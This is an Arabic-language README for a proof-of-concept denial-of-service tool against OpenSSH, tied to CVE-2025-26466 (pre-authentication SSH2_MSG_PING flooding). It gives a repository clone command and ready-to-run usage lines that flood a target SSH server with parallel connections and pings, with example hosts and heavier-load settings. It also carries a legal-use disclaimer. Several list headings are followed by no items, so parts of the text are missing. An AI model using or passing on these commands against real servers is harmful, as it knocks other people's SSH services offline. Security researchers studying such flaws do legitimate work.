
CVE-2025-26466 OpenSSH SSH2_MSG_PING DoS PoC
تنبيه: هذا الكود مخصص حصريًا للأغراض التعليمية واختبارات الأمان المصرح بها. الهجمات غير المصرح بها على الأنظمة الأخرى غير قانونية.
CVE-2025-26466 هي ثغرة رفض خدمة (DoS) قبل المصادقة في OpenSSH، تتيح إغراق خادم SSH قبل اكتمال تبادل المفاتيح.
يقبل الخادم حزم SSH2_MSG_PING (نوع الرسالة 192) بالفعل أثناء المصافحة الأولية، دون وجود اتصال موثّق. يؤدي هذا إلى:
# استنساخ المستودع
git clone https://github.com/acidboonrs/cve-2025-26466-openssh-poc.git
cd cve-2025-26466-openssh-poc
# منح صلاحية التنفيذ (اختياري)
chmod +x poc.py
لا توجد تبعيات إضافية مطلوبة (المكتبة القياسية فقط).
python3 poc.py 192.168.1.10
python3 poc.py <ziel-host> [port] [threads] [pings]
المعلمات:
<ziel-host> - IP الهدف أو اسم المضيف (مطلوب)[port] - منفذ SSH (الافتراضي: 22)[threads] - عدد الاتصالات المتوازية (الافتراضي: 10)[pings] - عدد PINGs لكل اتصال (الافتراضي: 500)# الافتراضي: localhost، المنفذ 22، 10 خيوط، 500 PINGs
python3 poc.py localhost
# حمل متزايد: 50 خيطًا، 1000 PINGs
python3 poc.py 192.168.1.10 22 50 1000
# منفذ مخصص
python3 poc.py example.com 2222 20 800
MIT License - انظر LICENSE للتفاصيل
يُطرح هذا الـ PoC لأنه:
استخدم هذا الكود فقط:
هجمات DoS غير المصرح بها يعاقب عليها القانون!
المؤلف: Vollassiliz (voidcall.dev)
تاريخ الإنشاء: 2025-01-29